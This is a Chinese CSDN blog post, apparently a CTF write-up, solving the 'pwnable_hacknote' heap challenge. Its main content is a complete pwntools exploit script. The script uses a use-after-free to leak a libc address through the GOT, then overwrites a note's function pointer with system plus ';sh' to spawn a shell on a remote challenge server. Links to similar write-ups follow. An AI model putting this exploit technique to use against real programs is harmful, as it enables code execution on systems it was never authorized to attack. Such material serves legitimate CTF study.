pwnable_hacknote 5/100

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量187 收藏
点赞数 1
分类专栏: PWN 文章标签: linux gnu 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123211113
版权
该博客详细展示了如何利用Use-After-Free (UAF) 漏洞在目标系统上执行命令。首先,通过发送特定的输入触发漏洞,然后利用漏洞修改内存中的数据,将/bin/sh的地址放入堆中。接着,通过再次触发漏洞,将system函数的地址与shellcode连接起来,最终通过显示已修改的条目来执行shell命令。整个过程涉及到了内存管理、ELF文件解析和gdb调试。
摘要由CSDN通过智能技术生成

uaf漏洞利用

sh  “;”间隔执行命令

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './hacknote'
# local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
# remote_libc = './libc-2.23.so'
 
 
select = 1

if select == 0:
    p = process(local_file)
    # libc = ELF("local_libc")
else:
    p = remote('node4.buuoj.cn',28214)
    libc = ELF("./32libc-2.23.so")

e = ELF(local_file)

context.log_level = 'debug'
context.arch = "i386"
context.os = 'linux'

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
sea     = lambda delim,data         :p.sendafter(delim, data)
rc      = lambda numb=4096          :p.recv(numb)
rl      = lambda                    :p.recvline()
ru      = lambda delims			    :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, b'\x00'))
uu64    = lambda data               :u64(data.ljust(8, b'\x00'))
info_addr = lambda tag, addr        :p.info(tag + ': {:#x}'.format(addr))

def dbg(cmd=''):
     gdb.attach(p,cmd)

def add(size,content):
    ru(b"Your choice :")
    se(b'1')
    ru(b":")
    se(str(size).encode())
    ru(b":")
    se(content)

def delete(index):
    ru(b"Your choice :")
    se(b'2')
    ru(b":")
    se(str(index).encode())
    ru(b"Success")

def show(index):
    ru(b"Your choice :")
    se(b'3')
    ru(b':')
    se(str(index).encode())

bss_addr = 0x804A050

add(0x10,b'/bin/sh\x00\x00')#0
add(0x10,b'bbbb')#1
delete(1)
delete(0)
add(0x8,p32(0x804862b) + p32(e.got['puts']))#2
show(1)
addr = u32(p.recv(4))
success(hex(addr))
# libc = LibcSearcher('puts',addr)
libc_base = addr - libc.sym['puts']
success("base: "+ hex(libc_base))
sys = libc_base + libc.sym['system']
delete(2)

add(0x8,p32(sys) + b";sh\x00")
show(1)

p.interactive()

cut_maize
关注
专栏目录
pwnable_hacknote
qq_41560595的博客
04-09 821
IDA,F5 main函数 add_note 函数 notelist是4字节。在源代码中,每个notelist[i]装的是新malloc的地址。 *notelist指向这个地址的内容。 *notelist[i]=print_note_content ,print_note_content又是4个字节。 v1指针指向notelist[0]的内容,即新的malloc地址。那么*notelist内容就可以被分为v1[0]和v1[1]。v1[0]的内容是print_note_content返回值。 v1[1]
pwnable.tw——hacknote
40KO的博客
02-24 861
很少做pwn,之前也只懂点rop,现在跟着练练pwn的堆利用吧,pwnable.tw上的一题hacknote,比较纯粹的uaf题目,还好不久前看了点glibc内存管理的东西,可以派上用场了。 逆向很轻松,那为什么不直接给源码呢。。。根据add_note函数很容易了解note的结构体特征 unsigned int add_node() { note *v0; // ebx signed...
pwnable_hacknote_WP
weixin_56434818的博客
03-01 874
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
[BUUCTF]-PWN:pwnable_hacknote解析
2301_79326813的博客
01-29 360
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1090
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 544
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
pwnable.tw——hacknote分析
Eagle_hwei的博客
02-24 451
hacknote的题目分析 2020-02-2421:22:47 by hawkJW 题目附件、ida文件及wp链接   这是一道比较经典的题目,所以稍微记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。 没什么好说的,还是比较经典的...
pwnable.tw hacknote write up
qq_43189757的博客
09-08 286
程序分析: 程序有四个操作: 1.Add note 2.Delete note 3.Print note 4.Exit 1.Add note 在bss段中存放note的指针,每一个note 包含两个堆块,add的过程中第一个堆块的数据区的开始四字节存放调用puts的函数地址(0x804862b),随后四个字节存放后面存放content 的堆块的地址 2.Delete note 漏洞点发生在Dele...
hacknote
m0_48127441的博客
04-23 146
0x0804A050 指针数组 32位 1.alloc malloc(0x8) == >chunk(0x10) struct note {函数地址,内容指针} malloc(size) 2.del free(note.内容指针) free(note) 3.print s[idx](s[idx]) 4.exit free(fas...
hacknote.zip
12-30
本题目是攻防世界一道6分的堆漏洞题目,在ctf wiki上面有比较详细的解析和漏洞利用,几乎一模一样,但区别是这道题没有后门函数,所以漏洞利用的方式发生了变化,推荐大家动手分析。
(攻防世界)(pwn)hacknote
PLpa的博客
07-31 3451
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
pwnable.tw】hacknote
qq_61670993的博客
09-24 108
UAF
攻防世界 —— hacknote
qq_41696518的博客
07-19 1652
攻防世界——hacknote
pwnable.tw wp - hacknote
fa1c4的blog
09-21 244
前言 pwnable.tw上的hacknote, 与攻防世界的hacknote类似的题目 分析过程 add函数, 还算合理 unsigned int add() { int v0; // ebx int i; // [esp+Ch] [ebp-1Ch] int size; // [esp+10h] [ebp-18h] char buf[8]; // [esp+14h] [ebp-14h] BYREF unsigned int v5; // [esp+1Ch] [ebp-Ch] v
hacknote 记录
weixin_55190422的博客
11-27 377
做了这么久的Pwn终于遇到堆的题目了。 而此处就有一个漏洞——UAF漏洞,即释放之后并没有清空指针,则仍然可以调用其他的相关函数。 也就是,实际上调用了控制chunk可用部分的前4个字节的函数指针所指向的函数,参数为控制chunk可用部分地址。 那么,如果我们可以修改控制chunk中可用部分的前4个字节所指向的位置,修改为system,并在后四个字节中添加上 ||sh (这里一开始没想到,注意为了执行shell命令,可以的一些方法 sh# 或者 ||sh ,前一个可以注释掉后面的...
【PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 467
回顾经典老题。一、
Hacknote 一道简单的UAF漏洞题
红叶的博客
03-09 412
看了大佬们的WP两天,勉强搞懂了原理。如有任何错误请在评论区指出。
buuctf hacknote
qq_65147345的博客
07-17 889
程序有uaf漏洞,可以通过uaf漏洞更改输出函数为........
pwn hacknote
最新发布
05-21
HackNote 是一道非常经典的 pwn 题目,其难度较为适中,适合初学者进行练习。其主要思路是通过堆溢出来实现 getshell。...如果您对 HackNote 题目感兴趣,可以在一些在线平台上进行尝试,比如 Pwnable.kr 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值